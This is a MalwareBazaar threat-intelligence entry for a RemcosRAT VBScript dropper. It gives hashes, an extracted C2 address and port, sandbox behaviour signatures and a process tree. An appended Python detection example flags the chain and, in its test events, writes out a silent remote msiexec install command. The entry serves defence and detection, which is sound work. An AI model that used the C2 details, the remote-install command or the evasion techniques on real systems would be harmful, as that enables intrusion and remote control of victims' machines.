MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RemcosRAT


Vendor detections: 8



SHA256 hash: 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
SHA3-384 hash: c6c114853014e7f5ca9a7f1d0fb3945f587b5d29507597edce1177493e00fb16611c057edaacd2995432546322fb888e
SHA1 hash: 2c0f959b61081a10a085ad8e8f8741a69e2d9934
MD5 hash: 183d51767fe58e2bd256688315d25709
humanhash: texas-virginia-maine-juliet
File name: secondaryTask.vbs
Signature: RemcosRAT
File size: 876 bytes
First seen: 2024-11-30 00:23:16 UTC
Last seen: Never
File type: Visual Basic Script (vbs)
MIME type: text/plain
ssdeep: 24:PAilGdehX66xyIpDkJbJ4CQjamgX3TX83qpz/7:P9GaZpDkNSKZzD
Threatray: 4'629 similar samples on MalwareBazaar
TLSH: T16B116F4D8EBE8673EDB403F255FF31848BCC640180A9541F25A7A8342681C0587676DF
Magika: vba
Reporter: aachum
Tags: RemcosRAT vbs


iamaachum
Remcos C2: 185.157.162.126:1995

Intelligence


File Origin
# of uploads :
1
# of downloads :
130
Origin country :
ES
Vendor Threat Intelligence
Verdict:
Malicious
Score:
96.5%
Tags:
remcos virus gates overt
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
cmd evasive lolbin msiexec remote
Result
Threat name:
Clipboard Hijacker, MicroClip, Remcos
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Signature
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Injects a PE file into a foreign processes
Installs a MSI (Microsoft Installer) remotely
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
VBScript performs obfuscated calls to suspicious functions
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Clipboard Hijacker
Yara detected MicroClip
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph:
Behavior Graph ID: 1565487 (sample secondaryTask.vbs, start date 30/11/2024, architecture WINDOWS, score 100). The graph image is not reproduced here; the node and edge text recoverable from it is summarised below.
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 10 other signatures.
Network:
  185.157.162.126 (OBE-EUROPE Obenetwork Europe SE, Sweden)
  shed.dual-low.s-part-0035.t-0009.t-msedge.net
  github.com 20.233.83.145:443 (MICROSOFT-CORP-MSN-AS-BLOCK, United States), contacted by msiexec.exe
  raw.githubusercontent.com 185.199.108.133:443 (FASTLY, Netherlands), contacted by msiexec.exe
  6 other IPs or domains
Process tree:
  msiexec.exe
    dropped: C:\Windows\Installer\MSI3C7A.tmp (PE32), C:\Windows\Installer\MSI3C5A.tmp (PE32), C:\Windows\Installer\MSI3C2A.tmp (PE32), 6 other files (4 malicious)
    started: Updwork.exe, EHttpSrv.exe, msiexec.exe
    Updwork.exe
      dropped: C:\Users\user\AppData\Local\...\zlib1.dll (PE32)
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 4 other signatures
      started: WerFault.exe
    EHttpSrv.exe
      signatures: Found API chain indicative of debugger detection; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
      started: cmd.exe
      cmd.exe
        signatures: Found hidden mapped module (file has been removed from disk); Switches to a custom stack to bypass stack traces
        started: conhost.exe
  RaftelibeGasrss.exe
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Tries to detect virtualization through RDTSC time measurements; 3 other signatures
    started: WerFault.exe
  EHttpSrv.exe
    signatures: Maps a DLL or memory area into another process
    started: cmd.exe
    cmd.exe
      dropped: C:\Users\user\AppData\Local\Temp\dsx (PE32)
      started: EHttpSrv.exe, conhost.exe
      EHttpSrv.exe
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
  3 other processes
    signatures: VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Installs a MSI (Microsoft Installer) remotely
    started: cmd.exe, cmd.exe, msiexec.exe
    cmd.exe
      dropped: C:\Users\user\AppData\Local\...\yljutqdulam (PE32)
      started: EHttpSrv.exe, conhost.exe
    cmd.exe
      started: conhost.exe
Threat name:
Script-WScript.Backdoor.Remcos
Status:
Suspicious
First seen:
2024-11-29 07:01:01 UTC
File Type:
Text (VBS)
AV detection:
5 of 24 (20.83%)
Threat level:
  5/5
Result
Malware family:
Score:
  10/10
Tags:
family:hijackloader family:remcos botnet:v2 discovery loader rat
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
NSIS installer
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Suspicious use of SetThreadContext
Blocklisted process makes network request
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Use of msiexec (install) with remote resource
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Remcos
Remcos family
Malware Config
C2 Extraction:
185.157.162.126:1995
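The sandbox reports above describe one chain: a Windows Script Host process driving msiexec with a remote package ("Installs a MSI (Microsoft Installer) remotely", "Use of msiexec (install) with remote resource"), msiexec dropping and launching further executables, and a beacon to the Remcos C2 extracted from the configuration. The following detection logic is an added example written for this entry, not MalwareBazaar or sandbox-vendor code. The simplified Sysmon-style event records, their field names and the sample process and network events (including the example.invalid package URL) are constructed for the example; the C2 address is the one extracted above.

```python
# Added example (not MalwareBazaar code): detection logic for the behaviour
# chain in the reports above. Event format is a simplified Sysmon-style
# process-create / network-connect record; field names and all sample events
# are constructed for this example.
import re
from dataclasses import dataclass

# C2 from the Remcos configuration extracted on this page.
REMCOS_C2 = {("185.157.162.126", 1995)}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# msiexec install / admin-install / package switch pointed at an http(s) URL
REMOTE_MSI = re.compile(r"[/-](?:i|a|package)\s*[\"']?https?://", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str


@dataclass
class NetEvent:
    pid: int
    dst_ip: str
    dst_port: int


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_script_host_ancestor(ev, by_pid, max_depth=3):
    """True if wscript/cscript is within max_depth parents (allows a cmd.exe hop)."""
    anc = by_pid.get(ev.ppid)
    for _ in range(max_depth):
        if anc is None:
            return False
        if basename(anc.image) in SCRIPT_HOSTS:
            return True
        anc = by_pid.get(anc.ppid)
    return False


def detect(proc_events, net_events):
    """Return (rule_name, pid) hits in order of discovery."""
    by_pid = {e.pid: e for e in proc_events}
    hits = []
    for e in proc_events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        # Rule 1: script host -> (cmd.exe ->) msiexec fetching a remote package
        if (name == "msiexec.exe" and REMOTE_MSI.search(e.cmdline)
                and has_script_host_ancestor(e, by_pid)):
            hits.append(("wsh_remote_msi_install", e.pid))
        # Rule 2: msiexec launching an executable outside the system directories
        # (the msiexec service instance it spawns lives in System32 and is ignored)
        if (parent is not None and basename(parent.image) == "msiexec.exe"
                and not e.image.lower().startswith(SYSTEM_DIRS)):
            hits.append(("msiexec_spawns_non_system_child", e.pid))
    # Rule 3: any process connecting to the known Remcos C2
    for n in net_events:
        if (n.dst_ip, n.dst_port) in REMCOS_C2:
            hits.append(("remcos_c2_connect", n.pid))
    return hits


def sample_events():
    """Constructed events mirroring the reported chain, plus a benign local MSI install."""
    procs = [
        ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
        ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
                  r'wscript.exe "C:\Users\user\Downloads\secondaryTask.vbs"'),
        ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
                  "cmd.exe /c msiexec /i https://example.invalid/pkg.msi /qn"),
        ProcEvent(400, 300, r"C:\Windows\System32\msiexec.exe",
                  "msiexec /i https://example.invalid/pkg.msi /qn"),
        ProcEvent(450, 400, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),
        ProcEvent(500, 400, r"C:\Users\user\AppData\Local\Temp\Updwork.exe", "Updwork.exe"),
        # benign: user installs a local MSI from Explorer
        ProcEvent(600, 100, r"C:\Windows\System32\msiexec.exe",
                  r'msiexec.exe /i "C:\Users\user\Downloads\tool.msi"'),
    ]
    nets = [
        NetEvent(500, "185.157.162.126", 1995),
        NetEvent(400, "185.199.108.133", 443),  # raw.githubusercontent.com: not flagged alone
    ]
    return procs, nets


if __name__ == "__main__":
    for rule, pid in detect(*sample_events()):
        print(f"{rule}: pid {pid}")
```

Rule 1 walks up to three parents so that the cmd.exe hop seen in the graph does not break the match; rule 3 is a plain IOC lookup and should be refreshed as the extracted configuration changes. The GitHub fetches are left unflagged on purpose: "Legitimate hosting services abused for malware hosting/C2" is only a useful signal in combination with the process chain, not on its own.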

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: RemcosRAT
File type: Visual Basic Script (vbs)
SHA256 hash: 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0 (this sample)

Comments